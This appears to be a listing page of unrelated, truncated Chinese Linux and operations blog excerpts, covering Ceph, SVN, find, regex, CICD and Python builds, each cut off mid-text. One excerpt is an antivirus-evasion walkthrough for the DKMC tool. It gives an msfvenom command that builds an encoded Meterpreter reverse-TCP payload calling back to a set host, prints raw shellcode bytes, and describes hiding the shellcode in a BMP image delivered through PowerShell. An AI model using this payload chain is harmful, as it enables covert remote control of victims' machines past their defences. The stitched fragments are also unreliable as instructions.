root权限

1.采用自定义配置文件的实现方法 1.1 自建CA 自建CA的机制：1.生成私钥；2.创建证书请求；3.使用私钥对证书请求签名。 由于测试环境，所以自建的CA只能是根CA。 所使用的配置文件如下: [default] name = root-ca /* 变量*/ default_ca = CA_default name_opt = ca_default cert_opt = ca_default [CA_default] home = . /* 变量*/ database = $home/db/index serial = $home/db/serial crlnumber = $home/db/crlnumber certificate = $home/$name.crt private_key = $home/private/$name.key RANDFILE = $home/private/random new_certs_dir = $home/certs unique_subject = no copy_extensions = none default_days = 3650 default_crl_days = 365 default_md = sha256 policy = policy_to_match [policy_to_match] countryName

umount 时 目标忙 解决办法 标签（空格分隔）： ceph ceph运维 osd 在删除osd后 umount 时，始终无法umonut，可以通过fuser查看设备被哪个进程占用，之后杀死进程，就可以顺利 umount 了。 [root@node2 ~]# umount /var/lib/ceph/osd/ceph-1 umount: /var/lib/ceph/osd/ceph-1：目标忙。 (有些情况下通过 lsof(8) 或 fuser(1) 可以 找到有关使用该设备的进程的有用信息) [root@node2 ~]# fuser -mv /var/lib/ceph/osd/ceph-1 用户 进程号 权限 命令 /var/lib/ceph/osd/ceph-1: root kernel mount /var/lib/ceph/osd/ceph-1 ceph 5979 F.... ceph-osd [root@node2 ~]# kill -9 5979 [root@node2 ~]# fuser -mv /var/lib/ceph/osd/ceph-1 用户 进程号 权限 命令 /var/lib/ceph/osd/ceph-1: root kernel mount /var/lib/ceph/osd/ceph-1 [root@node2 ~]# umount /var

一、准备工作 测试环境: vmware workstation15制作centos7虚拟机四台，分别命名为admin、node01、node02、node03.....（可安装一台，其他克隆即可）。 四台机器，一台admin，其他三台为node01，node02和node03。node01、node02和node03均为两块硬盘，一块安装系统，另一块做为osd。 测试环境都为一块网卡一个网络（实际环境分公共网络public network和集群网络cluster network）。 0、最小化安装centos7，配置网络连通性。（实际环境除了osd节点mon节点需要至少两块网卡） # vi /etc/sysconfig/network-scripts/ifcfg-ens* BOOTPROTO=none ONBOOT=yes IPADDR=192.168.129.131 NETMASK=255.255.255.0 GATEWAY=192.168.129.2 DNS1=8.8.8.8 1、关闭防火墙墙 #systemctl stop firewalld #systemctl disable firewalld 2、关闭selinux # setenforce 0 #vi /etc/selinux/config 修改SELINUX=disabled SELINUX=disabled

1. 安装 CentOS通过yum安装subversion。 # yum install subversion subversion安装在/bin目录： # which svnserve #查看目录命令/usr/bin/svnserve 检查一下subversion是否安装成功。不要使用1.8版本 # svnserve --version svnserve, version 1.7.14 (r1542130) 2. 建立版本库 subversion默认以 /var/svn 作为数据根目录，可以通过/etc/sysconfig/svnserve修改这个默认位置。 # vim /etc/sysconfig/svnserve 文件内容 OPTIONS="-r /var/svn" 可修改 使用svnadmin建立版本库svntest。 # mkdir -p /var/svn/kerui //递归创建多个目录 # svnadmin create /var/svn/kerui # ll /var/svn/kerui //查看目录中内容 total 24 drwxr-xr-x 2 root root 4096 Mar 2 14:30 conf drwxr-sr-x 6 root root 4096 Mar 2 14:30 db -r--r--r-- 1 root root 2 Mar 2 14

语法 find [path...] [options] [expression] [action] 命令 路径 选项 表达式 动作 使用方法 按照文件名查找（重点） 选项用 name 例：把跟下的所有yum文件找出来 按照文件大小查找（重点） 选项用 size 按照深度查找（了解） [root@localhost ~] # find / -maxdepth 4 -a -name "ifcfg-en*" / etc / sysconfig / network - scripts / ifcfg - ens33 按照文件类型（重点） 查看/dev文件下的b（设备文件）文件类型 [root@localhost ~] # find /dev -type b / dev / dm - 2 / dev / dm - 1 / dev / dm - 0 / dev / sr0 / dev / sdd / dev / sdc / dev / sdb / dev / sda2 / dev / sda1 / dev / sda 按照文件权限查看文件（了解） 查看隐藏文件，权限为644的文件 [root@localhost ~] # find . -perm 644 -ls 34373796 4 - rw - r- - r- - 1 root root 18 Dec 28 2013 . / . bash

CICD核心概念 CICD是持续集成（continuous integration，CI），持续交付（continuous delivery，CD），持续部署（continuous Deployment，CD）的简称。 指在开发过程中自动执行一系列脚本来减低开发引入bug的概率，在新代码从开发到部署的过程中，尽量减少人工的介入。 1，持续集成 持续集成指的是，频繁地（一天多次）将代码集成到主干。 它的好处有两个： 1）快速发现错误：每完成一点更新，就集成到主干，可以快速发现错误，定位错误也比较容易。 2）防止分支大幅偏离主干：如果不是经常集成，主干又在不断更新，会导致以后集成的难度变大，甚至难以集成。 持续集成的目的： 让产品可以快速迭代同时还能保持高质量，它的核心措施是：代码集成到主干之前，必须通过自动化测试，只要有一个测试用例失败，就不能集成。 Martin Fowler说过，"持续集成并不能消除Bug，而是让它们非常容易发现和改正。" 2， 持续交付 持续交付指的是频繁的将软件的新版本交付给质量团队或用户，以供评审，如果评审通过，代码就进入生产阶段。 持续交付可以看作是持续集成的下一步，强调的是，不管怎样更新，软件是随时随地可以交付的。 3，持续部署 持续部署是持续交付的下一步，指的是代码通过评审之后，自动部署到生产环境。 持续部署的目标是：代码在任何时候都是可以部署的

Linux中常用的特殊符号 '' 所见即所得，吃啥吐啥 "" 特殊符号会被解析运行 `` ==== $() 先运行里面的命令 把结果留下 > 重定向符号 先清空文件的内容 然后追加文件的最后 >> 追加重定向 追加文件的最后 2> 错误重定向 只有错误的信息 才会通过这个漏洞进入文件中 2>> 错误追加重定向 ~ 当前用户的家目录 root ~ /root oldboy ~ /home/oldboy ! 查找并运行历史命令 !awk 包含awk的命令 最近的一条运行 history |grep awk # 注释 root用户的命令提示符 $ 取出变量的内容 awk $取某一列的内容 普通用户的命令提示符 * 所有 任何东西 \ 撬棍 转义字符 && 前一个命令执行成功然后在执行后一个命令 ifdown eth0 && ifup eth0 || 前一个命令支持失败了再执行后面的命令 通配符 通配符是用来查找文件的。如：‘*.txt’ 表示匹配所有以 . txt结尾的文件##1. * 所有，任意 找出文件名包含oldboy的文件 mkdir -p /oldboy cd /oldboy touch oldboy.txt oldboy oldboyfile oldboy.awk eduoldboy [root@oldboyedu01-nb oldboy]# find /oldboy/

今天整理以前的笔记，把这部分工具整理了一下，虽然没有白利用稳，但这些工具也能在一定程度起到一定的免杀作用。 DKMC 项目地址： https://github.com/Mr-Un1k0d3r/DKMC 可以创建一个 outputs 文件夹 存放 shellcode 启动 python dkmc.py 操作顺序： Sc ：是将 msf 生成的 raw 文件转换位 shellcode 代码 Gen ：是将其 msf 的 shellcode 注入到 BMP 图片中 Ps ：将其 BMP 的图片转换为 powershell 代码 Web ：将其开启 web 功能 第一步,先生成原始的 shellcode msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.88.174 lport=7777 -e x86/shikata_ga_nai -i 16 -f raw -o /root/DKMC/dk 第二步，生成 shellcode ，将生成的 shellcode 保存到文本里，exit 退出 \xdb\xc3\xb8\xa4\x85\xc1\x7d\xd9\x74\x24\xf4\x5e\x31\xc9\xb1\xbb\x83\xee\xfc\x31\x46\x15\x03\x46\x15\x46\x70\x7f\xa8\x6b

第1章 扩展正则表达式 1.1 + 前一个字符连续出现了 1 次或 1 次以上 egrep "0+" clsn.txt 1 次或 1 次以上 >=1 egrep "0*" clsn.txt 0 次或 0 次以上 >=0 1.1.1 找到文本中的 0 [root@znix ~]# egrep "0+" clsn.txt my qq num is 49000448. not 4900000448. [root@znix ~]# egrep -o "0+" clsn.txt 000 00000 1.1.2 取出文件中的大写字母 [root@znix ~]# grep -o "[A-Z]" clsn.txt I I I O L D B O Y 1.1.3 取出连续出现的大写字母 [root@znix ~]# egrep -o "[A-Z]+" clsn.txt I I I clsn 1.1.4 显示所有的单词 [root@znix ~]# egrep -o "[A-Za-z]+" clsn.txt I am clsn teacher 1.2 | 或者 表示找其中的一个或者是另外一个。 [root@znix ~]# egrep "clsn|oldbey" clsn.txt -o clsn clsn oldbey 找 /etc/services 中的两个端口 [root@znix ~]#

参考博客： https://blog.csdn.net/lfs666666/article/details/88901543 当使用服务器时，没有办法使用sudo也就是root权限，但是有些环境必须要安装，于是我就自己试试安装python3.6然后创建3.6版本的虚拟环境。 1.下载python3.6.10版本（地址： https://www.python.org/downloads/release/python-3610rc1/ ） #解压 tar -zxvf Python-3.6.10.tgz cd Python-3.6.10/ 弄好之后需要先下载zlib然后再编译python 2.下载zlib（地址：http://www.zlib.net/zlib-1.2.11.tar.gz） #解压 tar -zxvf zlib-1.2.11.tar.gz cd zlib-1.2.11/ #python_path是自己的python目录，我的是/home/lzq/python3.6/ ./configure --prefix=python_path make make install 3.编译安装python cd Python-3.6.10/ #python_path是python的位置，我的是/home/lzq/Python3.6.10/ ./configure --prefix